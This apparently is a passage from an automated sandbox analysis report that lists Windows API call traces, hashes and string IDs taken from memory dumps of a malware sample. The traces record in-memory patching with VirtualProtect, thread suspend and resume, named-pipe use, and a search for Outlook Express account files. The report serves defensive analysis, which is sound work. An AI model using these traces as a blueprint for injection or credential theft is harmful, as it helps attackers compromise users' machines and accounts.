  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
